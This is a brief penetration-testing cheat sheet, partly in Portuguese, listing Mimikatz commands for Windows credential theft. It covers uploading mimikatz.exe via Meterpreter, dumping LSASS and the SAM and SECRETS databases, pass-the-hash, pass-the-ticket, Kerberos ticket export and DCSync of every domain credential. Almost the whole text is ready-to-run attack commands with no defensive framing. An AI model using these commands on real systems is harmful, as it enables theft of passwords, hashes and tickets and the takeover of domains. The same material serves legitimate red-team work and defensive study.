Mimikatz
O Mimikatz pode extrair hashes da memória do processo lsass.exe, onde os hashes são armazenados em cache.
Carregar o arquivo de extensão Mimikatz em uma sessão meterpreter:
upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exeComandos
- Dump LSASS:
privilege::debug
token::elevate
sekurlsa::logonpasswords
- (Over) Pass The Hash
privilege::debug
sekurlsa::pth /user:<UserName> /ntlm:<> /domain:<DomainFQDN>
- List all available kerberos tickets in memory
sekurlsa::tickets
- Dump local Terminal Services credentials
sekurlsa::tspkg
- Dump and save LSASS in a file
sekurlsa::minidump c:\temp\lsass.dmp
- List cached MasterKeys
sekurlsa::dpapi
- List local Kerberos AES Keys
sekurlsa::ekeys
- Dump SAM Database
lsadump::sam
- Dump SECRETS Database
lsadump::secrets
- Inject and dump the Domain Controler's Credentials
privilege::debug
token::elevate
lsadump::lsa /inject
- Dump the Domain's Credentials without touching DC's LSASS and also remotely
lsadump::dcsync /domain:<DomainFQDN> /all
- List and Dump local kerberos credentials
kerberos::list /dump
- Pass The Ticket
kerberos::ptt <PathToKirbiFile>
- List TS/RDP sessions
ts::sessions
- List Vault credentials
vault::listLast updated